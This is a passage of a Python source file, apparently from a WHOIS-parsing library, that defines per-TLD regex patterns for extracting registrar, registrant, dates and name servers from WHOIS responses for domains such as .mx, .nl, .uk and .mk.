R(r\"Domain name:\\s*([^(i|\\n)]+)\"),\n \"registrar\": R(r\"(?<=Owner contact:\\s)[\\s\\S]*?Organization:(.*)\"),\n \"registrant_country\": R(r\"(?<=Owner contact:\\s)[\\s\\S]*?Country:(.*)\"),\n \"registrant\": R(r\"(?<=Owner contact:\\s)[\\s\\S]*?Name:(.*)\"),\n \"creation_date\": R(r\"Domain registered: *(.+)\"),\n \"expiration_date\": R(r\"Record will expire on: *(.+)\"),\n \"name_servers\": R(r\"Domain Nameservers:\\s*(.+)\\n\\s*(.+)\\n\"),\n}\n\nZZ[\"mx\"] = {\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"creation_date\": R(r\"Created On:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Last Updated On:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s?(.+)\"),\n \"name_servers\": R(r\"\\sDNS:\\s*(.+)\"),\n \"registrant_country\": R(r\"\\n\\s*Country:\\s*([^\\n]*)\\n\"),\n \"status\": None,\n \"registrant\": R(r\"\\nRegistrant:\\s*\\n\\s*Name:\\s([^\\n]*)\\n\"),\n}\nZZ[\"com.mx\"] = {\"extend\": \"mx\"}\n\n# New-Caledonia (French Territory)\nZZ[\"nc\"] = {\n \"extend\": \"fr\",\n \"domain_name\": R(r\"Domain\\s*:\\s(.+)\"),\n \"registrar\": R(r\"Registrar\\s*:\\s(.+)\"),\n \"registrant\": R(r\"Registrant name\\s*:\\s(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"Created on\\s*:\\s(.*)\"),\n \"expiration_date\": R(r\"Expires on\\s*:\\s(.*)\"),\n \"updated_date\": R(r\"Last updated on\\s*:\\s(.*)\"),\n \"name_servers\": R(r\"Domain server [0-9]{1,}\\s*:\\s(.*)\"),\n \"status\": None,\n}\n\nZZ[\"nl\"] = {\n \"extend\": \"com\",\n \"expiration_date\": None,\n \"registrant_country\": None,\n \"domain_name\": R(r\"Domain name:\\s?(.+)\"),\n \"name_servers\": R(r\"Domain nameservers.*:\\n%s\" % xStr(r\"(?:\\s+(\\S+)\\n)?\", 10)),\n \"reseller\": R(r\"Reseller:\\s?(.+)\"),\n \"abuse_contact\": R(r\"Abuse Contact:\\s?(.+)\"),\n \"_test\": \"google.nl\",\n \"_slowdown\": 5,\n}\n\n# Norway\nZZ[\"no\"] = {\n \"domain_name\": R(r\"Domain Name\\.+:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar Handle\\.+:\\s?(.+)\"),\n \"registrant\": None,\n \"registrant_country\": None,\n \"creation_date\": R(r\"Created:\\s?(.+)\"),\n \"expiration_date\": None,\n \"updated_date\": R(r\"Last Updated:\\s?(.+)\"),\n \"name_servers\": R(r\"Name Server Handle\\.+:\\s*(.+)\\s*\"),\n \"status\": None,\n \"emails\": None,\n}\n\nZZ[\"nyc\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n 
\"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n}\n\nZZ[\"nz\"] = {\n \"domain_name\": R(r\"domain_name:\\s?(.+)\"),\n \"registrar\": R(r\"registrar_name:\\s?(.+)\"),\n \"registrant\": R(r\"registrant_contact_name:\\s?(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"domain_dateregistered:\\s?(.+)\"),\n \"expiration_date\": R(r\"domain_datebilleduntil:\\s?(.+)\"),\n \"updated_date\": R(r\"domain_datelastmodified:\\s?(.+)\"),\n \"name_servers\": R(r\"ns_name_[0-9]{2}:\\s?(.+)\"),\n \"status\": R(r\"query_status:\\s?(.+)\"),\n \"emails\": R(r\"([\\w\\.-]+@[\\w\\.-]+\\.[\\w]{2,4})\"),\n}\n\nZZ[\"co.nz\"] = {\"extend\": \"com\"}\n\nZZ[\"org\"] = {\n \"extend\": \"com\",\n \"expiration_date\": R(r\"\\nRegistry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"\\nLast Updated On:\\s?(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s?(.+)\\s*\"),\n}\n\nZZ[\"pharmacy\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"status:\\s?(.+)\"),\n}\n\nZZ[\"pl\"] = {\n \"extend\": \"uk\",\n \"registrar\": R(r\"\\nREGISTRAR:\\s*(.+)\\n\"),\n \"creation_date\": R(r\"\\ncreated:\\s*(.+)\\n\"),\n \"updated_date\": R(r\"\\nlast modified:\\s*(.+)\\n\"),\n \"expiration_date\": R(r\"\\noption expiration date:\\s*(.+)\\n\"),\n \"name_servers\": R(r\"nameservers:%s\" % xStr(r\"(?:\\s+(\\S+)[^\\n]*\\n)?\", 4)),\n \"status\": R(r\"\\nStatus:\\n\\s*(.+)\"),\n}\n\nZZ[\"pt\"] = {\n \"_server\": \"whois.dns.pt\",\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain:\\s?(.+)\"),\n \"registrar\": None,\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Date:\\s?(.+)\"),\n \"updated_date\": None,\n \"name_servers\": R(r\"Name Server:%s\" % xStr(r\"(?:\\s*(\\S+)[^\\n]*\\n)?\", 2)),\n \"status\": R(r\"Domain Status:\\s?(.+)\"),\n \"_test\": None, # portugal never answeres, timout is all we get\n}\n\nZZ[\"pw\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n}\n\nZZ[\"ru\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.tcinet.ru\",\n \"domain_name\": R(r\"domain:\\s*(.+)\"),\n \"creation_date\": R(r\"created:\\s*(.+)\"),\n \"expiration_date\": R(r\"paid-till:\\s*(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"status\": R(r\"state:\\s*(.+)\"),\n \"_test\": \"tcinet.ru\",\n}\n\nZZ[\"sa\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s*(.+\\.sa)\\s\"),\n \"registrant\": R(r\"Registrant:\\n*(.+)\\n\"),\n \"name_servers\": R(r\"Name Servers:\\s*(.+)\\s*(.+)?\"),\n \"registrant_country\": None,\n \"registrar\": None,\n \"creation_date\": None,\n \"expiration_date\": None,\n \"updated_date\": None,\n \"status\": None,\n \"emails\": None,\n}\n\nZZ[\"sh\"] = {\n \"extend\": \"com\",\n \"registrant\": R(r\"\\nRegistrant Organization:\\s?(.+)\"),\n \"expiration_date\": R(r\"\\nRegistry Expiry Date:\\s*(.+)\"),\n \"status\": R(r\"\\nDomain Status:\\s?(.+)\"),\n}\n\nZZ[\"se\"] = {\n \"domain_name\": 
R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"created:\\s+(\\d{4}-\\d{2}-\\d{2})\"),\n \"expiration_date\": R(r\"expires:\\s+(\\d{4}-\\d{2}-\\d{2})\"),\n \"updated_date\": R(r\"modified:\\s+(\\d{4}-\\d{2}-\\d{2})\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"status\": R(r\"status:\\s?(.+)\"),\n \"registrant\": R(r\"holder:\\s*([^\\n]*)\\n\"),\n}\n\n# Singapore - Commercial sub-domain\nZZ[\"com.sg\"] = {\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s?(.+)\"),\n \"registrant\": R(r\"Registrant:\\r?\\n\\r?\\n\\s*Name:\\s*(.+)\\r?\\n\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Modified Date:\\s?(.+)\"),\n \"name_servers\": R(r\"Name Servers:(?:\\s+(\\S+))(?:\\s+(\\S+))?(?:\\s+(\\S+))?(?:\\s+([\\.\\w]+)\\s+)?\"),\n \"status\": R(r\"Domain Status:\\s*(.*)\\r?\\n\"),\n \"emails\": R(r\"[\\w\\.-]+@[\\w\\.-]+\\.[\\w]{2,4}\"),\n}\n\n# Slovakia\nZZ[\"sk\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.sk-nic.sk\",\n \"domain_name\": R(r\"Domain:\\s?(.+)\"),\n \"creation_date\": R(r\"Created:\\s?(.+)\"),\n \"expiration_date\": R(r\"Valid Until:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated:\\s?(.+)\"),\n \"name_servers\": R(r\"Nameserver:\\s*(\\S+)\"),\n \"_test\": \"sk-nic.sk\",\n # look for Organiztion but in the proper section\n \"registrant\": findFromToAndLookFor(\n fromStr=r\"Domain registrant:\",\n toStr=r\"\\n\\n\",\n lookForStr=r\"Organization:\\s*([^\\n]*)\\n\",\n ),\n # Country Code:\n \"registrant_country\": findFromToAndLookFor(\n fromStr=r\"Domain registrant:\",\n toStr=r\"\\n\\n\",\n lookForStr=r\"Country Code:\\s*([^\\n]*)\\n\",\n ),\n \"registrar\": findFromToAndLookFor(\n fromStr=r\"\\nRegistrar:\",\n toStr=r\"\\n\\n\",\n lookForStr=r\"Organization:\\s*([^\\n]*)\\n\",\n verbose=True,\n ),\n}\n\nZZ[\"tel\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"\\nRegistry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n}\n\n# Thailand - Commercial sub-domain\nZZ[\"co.th\"] = {\n \"_server\": \"whois.thnic.co.th\",\n \"extend\": \"com\",\n \"registrant\": R(r\"Domain Holder Organization:\\s?(.+)\"),\n \"registrant_country\": R(r\"Domain Holder Country:\\s?(.+)\"),\n \"creation_date\": R(r\"Created date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Exp date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated date:\\s?(.+)\"),\n \"_test\": \"thnic.co.th\",\n}\n\nZZ[\"tn\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain name\\.+:(.+)\\s*\"),\n \"registrar\": R(r\"Registrar\\.+:(.+)\\s*\"),\n \"registrant\": R(r\"Owner Contact\\n+Name\\.+:\\s?(.+)\"),\n \"registrant_country\": R(r\"Owner Contact\\n(?:.+\\n)+Country\\.+:\\s(.+)\"),\n \"creation_date\": R(r\"Creation date\\.+:\\s?(.+)\"),\n \"expiration_date\": None,\n \"updated_date\": None,\n \"name_servers\": R(r\"DNS servers\\n%s\" % xStr(r\"(?:Name\\.+:\\s*(\\S+)\\n)?\", 4)),\n \"status\": R(r\"Domain status\\.+:(.+)\"),\n}\n\nZZ[\"tv\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.tv\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": 
R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"_test\": \"nic.tv\",\n}\n\nZZ[\"tz\"] = {\n \"domain_name\": R(r\"\\ndomain:\\s*(.+)\"),\n \"registrar\": R(r\"\\nregistrar:\\s?(.+)\"),\n \"registrant\": R(r\"\\nregistrant:\\s*(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"\\ncreated:\\s*(.+)\"),\n \"expiration_date\": R(r\"expire:\\s?(.+)\"),\n \"updated_date\": R(r\"\\nchanged:\\s*(.+)\"),\n \"status\": None,\n \"name_servers\": R(r\"\\nnserver:\\s*(.+)\"),\n}\n\nZZ[\"ua\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"\\ndomain:\\s*(.+)\"),\n \"registrar\": R(r\"\\nregistrar:\\s*(.+)\"),\n \"registrant_country\": R(r\"\\ncountry:\\s*(.+)\"),\n \"creation_date\": R(r\"\\ncreated:\\s+(.+)\"),\n \"expiration_date\": R(r\"\\nexpires:\\s*(.+)\"),\n \"updated_date\": R(r\"\\nmodified:\\s*(.+)\"),\n \"name_servers\": R(r\"\\nnserver:\\s*(.+)\"),\n \"status\": R(r\"\\nstatus:\\s*(.+)\"),\n}\n\nZZ[\"uk\"] = {\n \"extend\": \"com\",\n \"registrant\": R(r\"Registrant:\\n\\s*(.+)\"),\n \"creation_date\": R(r\"Registered on:\\s*(.+)\"),\n \"expiration_date\": R(r\"Expiry date:\\s*(.+)\"),\n \"updated_date\": R(r\"Last updated:\\s*(.+)\"),\n \"name_servers\": R(r\"Name servers:%s\\n\\n\" % xStr(r\"(?:\\n[ \\t]+(\\S+).*)?\", 10)), # capture up to 10\n \"status\": R(r\"Registration status:\\n\\s*(.+)\"),\n}\n\nZZ[\"uz\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"name_servers\": R(r\"Domain servers in listed order:%s\\n\\n\" % xStr(r\"(?:\\n\\s+(\\S+))?\", 4)),\n # sometimes 'not.defined is returned as a nameserver (e.g. 
google.uz)\n}\n\nZZ[\"wiki\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n}\n\nZZ[\"work\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.work\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"_test\": \"nic.work\",\n}\n\nZZ[\"ac\"] = {\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"registrar\": R(r\"Registrar:\\s+(.+)\"),\n \"status\": R(r\"Domain Status:\\s(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s+(\\S+)\"),\n \"registrant_country\": R(r\"Registrant Country:\\s*(.*)\\r?\\n\"),\n \"updated_date\": R(r\"Updated Date:\\s+(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s+(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s+(.+)\"),\n \"registrant\": R(r\"Registrant Organization:\\s*([^\\n]*)\\n\"),\n}\n\nZZ[\"ae\"] = {\n \"extend\": \"ar\",\n \"_server\": \"whois.aeda.net.ae\",\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"registrar\": R(r\"Registrar Name:\\s+(.+)\"),\n \"status\": R(r\"Status:\\s(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s+(\\S+)\"),\n \"registrant_country\": None,\n \"creation_date\": None,\n \"expiration_date\": None,\n \"updated_date\": None,\n \"_test\": \"net.ae\",\n}\n\nZZ[\"bg\"] = {\n \"_server\": \"whois.register.bg\",\n \"domain_name\": R(r\"DOMAIN\\s+NAME:\\s+(.+)\"),\n \"status\": R(r\"registration\\s+status:\\s(.+)\"),\n \"name_servers\": R(r\"NAME SERVER INFORMATION:\\n%s\" % xStr(r\"(?:(.+)\\n)?\", 4)),\n \"creation_date\": None,\n \"expiration_date\": None,\n \"updated_date\": None,\n \"registrar\": None,\n \"registrant_country\": None,\n \"_test\": \"register.bg\",\n}\n\nZZ[\"bj\"] = {\n \"_server\": \"whois.nic.bj\",\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s+(\\S+)\\n\"),\n \"_test\": \"nic.bj\",\n}\n\nZZ[\"cf\"] = {\n \"domain_name\": None,\n \"name_servers\": R(r\"Domain Nameservers:\\n(?:(.+)\\n)(?:(.+)\\n)?(?:(.+)\\n)?(?:(.+)\\n)?\"),\n \"registrar\": R(r\"Record maintained by:\\s+(.+)\"),\n \"creation_date\": R(r\"Domain registered:\\s?(.+)\"),\n \"expiration_date\": R(r\"Record will expire:\\s?(.+)\"),\n \"updated_date\": None,\n \"registrant_country\": None,\n # very restrictive, after a few queries it will refuse with try again later\n \"_slowdown\": 5,\n}\n\nZZ[\"re\"] = {\n \"extend\": \"ac\",\n \"domain_name\": R(r\"domain:\\s+(.+)\"),\n \"registrar\": R(r\"registrar:\\s+(.+)\"),\n \"name_servers\": R(r\"nserver:\\s+(.+)\"),\n \"status\": R(r\"status:\\s(.+)\"),\n \"creation_date\": R(r\"created:\\s+(.+)\"),\n \"expiration_date\": R(r\"Expiry Date:\\s+(.+)\"),\n \"updated_date\": R(r\"last-update:\\s+(.*)\"),\n \"registrant_country\": None,\n}\n\nZZ[\"ro\"] = {\n \"domain_name\": R(r\"\\s+Domain name:\\s+(.+)\"),\n \"registrar\": R(r\"\\s+Registrar:\\s+(.+)\"),\n \"creation_date\": 
R(r\"\\s+Registered On:\\s+(.+)\"),\n \"expiration_date\": R(r\"\\s+Expires On:\\s+(.+)\"),\n \"status\": R(r\"\\s+Domain Status:\\s(.+)\"),\n \"name_servers\": R(r\"\\s+NameServer:\\s+(.+)\"),\n \"registrant_country\": None,\n \"updated_date\": None,\n}\n\nZZ[\"rs\"] = {\n \"domain_name\": R(r\"Domain name:\\s+(.+)\"),\n \"registrar\": R(r\"Registrar:\\s+(.+)\"),\n \"status\": R(r\"Domain status:\\s(.+)\"),\n \"creation_date\": R(r\"Registration date:\\s+(.+)\"),\n \"expiration_date\": R(r\"Expiration date:\\s+(.+)\"),\n \"updated_date\": R(r\"Modification date:\\s+(.+)\"),\n \"name_servers\": R(r\"DNS:\\s+(.+)\"),\n \"registrant_country\": None,\n \"registrant\": R(r\"Registrant:\\s*([^\\n]*)\\n\"),\n}\n\n# Singapore\nZZ[\"sg\"] = {\n \"_server\": \"whois.sgnic.sg\",\n \"registrar\": R(r\"Registrar:\\s+(.+)\"),\n \"domain_name\": R(r\"\\s+Domain name:\\s+(.+)\"),\n \"creation_date\": R(r\"\\s+Creation Date:\\s+(.+)\"),\n \"expiration_date\": R(r\"\\s+Expiration Date:\\s+(.+)\"),\n \"updated_date\": R(r\"\\s+Modified Date:\\s+(.+)\"),\n \"status\": R(r\"\\s+Domain Status:\\s(.+)\"),\n \"registrant_country\": None,\n \"name_servers\": R(r\"Name Servers:%s\" % xStr(r\"(?:\\n[ \\t]+(\\S+)[^\\n]*)?\", 4)),\n # make sure the dnssec is not matched\n \"_test\": \"sgnic.sg\",\n}\n\nZZ[\"tw\"] = {\n \"_server\": \"whois.twnic.net.tw\",\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"creation_date\": R(r\"\\s+Record created on\\s+(.+)\"),\n \"expiration_date\": R(r\"\\s+Record expires on\\s+(.+)\"),\n \"status\": R(r\"\\s+Domain Status:\\s+(.+)\"),\n \"registrar\": R(r\"Registration\\s+Service\\s+Provider:\\s+(.+)\"),\n \"updated_date\": None,\n \"registrant_country\": None,\n \"name_servers\": R(r\"Domain servers in listed order:%s\" % xStr(r\"(?:\\s+(\\S+)[ \\t]*\\r?\\n)?\", 4)),\n \"_test\": \"net.tw\",\n \"registrant\": R(r\"\\n\\s*Registrant:[\\s\\n]*([^\\n]*)\\n*\"),\n}\n\nZZ[\"ug\"] = {\n \"_server\": \"whois.co.ug\",\n \"domain_name\": R(r\"Domain name:\\s+(.+)\"),\n \"creation_date\": R(r\"Registered On:\\s+(.+)\"),\n \"expiration_date\": R(r\"Expires On:\\s+(.+)\"),\n \"status\": R(r\"Status:\\s+(.+)\"),\n \"name_servers\": R(r\"Nameserver:\\s+(.+)\"),\n \"registrant_country\": R(r\"Registrant Country:\\s+(.+)\"),\n \"updated_date\": R(r\"Renewed On:\\s+(.+)\"),\n \"registrar\": None,\n \"registrant\": R(r\"Registrant Organization:\\s*([^\\n]*)\\n\"),\n \"_test\": \"nic.co.ug\",\n}\n\nZZ[\"ws\"] = {\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s+(.+)\"),\n \"expiration_date\": R(r\"Registrar Registration Expiration Date:\\s+(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s+(.+)\"),\n \"status\": R(r\"Domain Status:\\s(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s+(.+)\"),\n \"registrant_country\": None,\n \"_server\": \"whois.website.ws\",\n \"_test\": \"website.ws\",\n}\n\nZZ[\"re\"] = {\n \"domain_name\": R(r\"domain:\\s+(.+)\"),\n \"status\": R(r\"status:\\s+(.+)\"),\n \"registrar\": R(r\"registrar:\\s+(.+)\"),\n \"name_servers\": R(r\"nserver:\\s+(.+)\"),\n \"creation_date\": R(r\"created:\\s+(.+)\"),\n \"expiration_date\": R(r\"Expiry Date:\\s+(.+)\"),\n \"updated_date\": R(r\"last-update:\\s+(.+)\"),\n \"registrant_country\": None,\n}\n\nZZ[\"bo\"] = {\n \"domain_name\": R(r\"\\s*NOMBRE DE DOMINIO:\\s+(.+)\"),\n \"registrant_country\": R(r\"País:\\s+(.+)\"),\n \"creation_date\": R(r\"Fecha de activación:\\s+(.+)\"),\n \"expiration_date\": R(r\"Fecha de corte:\\s+(.+)\"),\n 
\"registrar\": None,\n \"status\": None,\n \"name_servers\": None, # bo has no nameservers, use host -t ns \n \"updated_date\": None,\n \"registrant\": R(r\"CONTACTO ADMINISTRATIVO\\nRazón social:\\s*([^\\n]*)\\n\"),\n}\n\nZZ[\"hr\"] = {\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s+(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s+(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s+(.+)\"),\n \"status\": None,\n \"registrar\": R(r\"Registrar:\\s*([^\\n]*)\\n\"),\n \"expiration_date\": R(r\"Registrar Registration Expiration Date:\\s+(.+)\"),\n \"registrant_country\": R(r\"Registrant State/Province:\\s*([^\\n]*)\\n\"),\n \"registrant\": R(r\"Registrant Name:\\s*([^\\n]*)\\n\"),\n \"_test\": \"google.hr\",\n}\n\nZZ[\"gg\"] = {\n \"domain_name\": R(r\"Domain:\\s*\\n\\s+(.+)\"),\n \"status\": R(r\"Domain Status:\\s*\\n\\s+(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*\\n\\s+(.+)\"),\n \"name_servers\": R(r\"Name servers:(?:\\n\\s+(\\S+))?(?:\\n\\s+(\\S+))?(?:\\n\\s+(\\S+))?(?:\\n\\s+(\\S+))?\\n\"),\n \"creation_date\": R(r\"Relevant dates:\\s*\\n\\s+Registered on(.+)\"),\n \"expiration_date\": None,\n \"updated_date\": None,\n \"registrant_country\": None,\n \"registrant\": R(r\"\\nregistrant:\\s*\\n\\s*([^\\n]*)\\n\"),\n}\n\nZZ[\"sn\"] = {\n \"_server\": \"whois.nic.sn\",\n \"domain_name\": R(r\"Nom de domaine:\\s+(.+)\"),\n \"status\": R(r\"Statut:\\s+(.+)\"),\n \"registrar\": R(r\"Registrar:\\s+(.+)\"),\n \"name_servers\": R(r\"Serveur de noms:\\s*(.+)\"),\n \"creation_date\": R(r\"Date de création:\\s+(.+)\"),\n \"expiration_date\": R(r\"Date d'expiration:\\s+(.+)\"),\n \"updated_date\": R(r\"Dernière modification:\\s+(.+)\"),\n \"_test\": \"nic.sn\",\n \"registrant\": findFromToAndLookFor(\n fromStr=r\"\\n\\[HOLDER\\]\",\n toStr=r\"\\n\\n\",\n lookForStr=r\"Nom:\\s*([^\\n]*)\\n\",\n ),\n \"registrant_country\": findFromToAndLookFor(\n fromStr=r\"\\n\\[HOLDER\\]\",\n toStr=r\"\\n\\n\",\n lookForStr=r\"Pays:\\s*([^\\n]*)\\n\",\n ),\n}\n\nZZ[\"si\"] = {\n \"_server\": \"whois.register.si\",\n \"domain_name\": R(r\"domain:\\s+(.+)\"),\n \"status\": R(r\"status:\\s+(.+)\"),\n \"registrar\": R(r\"registrar:\\s+(.+)\"),\n \"name_servers\": R(r\"nameserver:\\s*(.+)\"),\n \"creation_date\": R(r\"created:\\s+(.+)\"),\n \"expiration_date\": R(r\"expire:\\s+(.+)\"),\n \"updated_date\": None,\n \"registrant_country\": None,\n \"_test\": \"register.si\",\n}\n\nZZ[\"st\"] = {\n # .ST domains can now be registered with many different competing registrars. 
and hence in different formats.\n # The \">>>\" line appears quite early; valid info after it would be suppressed by the \"^>>>\" cleanup rule, so that rule is switched off here\n \"extend\": \"com\",\n \"registrant_country\": R(r\"registrant-country:\\s+(\\S+)\"),\n \"registrant\": R(r\"registrant-organi(?:s|z)ation:\\s*(.+)\\r?\\n\"),\n \"expiration_date\": R(r\"Expiration\\s+Date:\\s?(.+)\"),\n}\n\nZZ[\"mk\"] = {\n \"_server\": \"whois.marnet.mk\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n # \"registrant\": R(r\"registrant:\\s?(.+)\"),\n \"registrant_country\": R(r\"Registrant Country:\\s?(.+)\"),\n \"creation_date\": R(r\"registered:\\s?(.+)\"),\n \"expiration_date\": R(r\"expire:\\s?(.+)\"),\n \"updated_date\": R(r\"changed:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\\s*\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"emails\": R(r\"[\\w\\.-]+@[\\w\\.-]+\\.[\\w]{2,4}\"),\n \"_test\": \"marnet.mk\",\n \"registrant\": findInSplitedLookForHavingFindFirst(\n findFirst=r\"registrant:\\s?(.+)\",\n lookForStr=r\"contact:\\s*{}\\n\",\n extract=r\"org:\\s*([^\\n]*)\\n\",\n ),\n \"_split\": newLineSplit(),\n}\n\nZZ[\"si\"] = {\n \"_server\": \"whois.register.si\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n \"registrant\": R(r\"registrant:\\s?(.+)\"),\n \"registrant_country\": R(r\"Registrant Country:\\s?(.+)\"),\n \"creation_date\": R(r\"created:\\s?(.+)\"),\n \"expiration_date\": R(r\"expire:\\s?(.+)\"),\n \"updated_date\": R(r\"changed:\\s?(.+)\"),\n \"name_servers\": R(r\"nameserver:\\s*(.+)\\s*\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"emails\": R(r\"[\\w\\.-]+@[\\w\\.-]+\\.[\\w]{2,4}\"),\n \"_test\": \"register.si\",\n}\n\nZZ[\"tc\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.tc\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Sponsoring Registrar:\\s?(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s*(.+)\\s*\"),\n \"status\": R(r\"Domain Status:\\s?(.+)\"),\n \"_test\": \"nic.tc\",\n}\n\nZZ[\"wf\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.wf\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n \"registrant\": R(r\"registrant:\\s?(.+)\"),\n \"registrant_country\": R(r\"Registrant Country:\\s?(.+)\"),\n \"creation_date\": R(r\"created:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"last-update:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\\s*\"),\n \"status\": 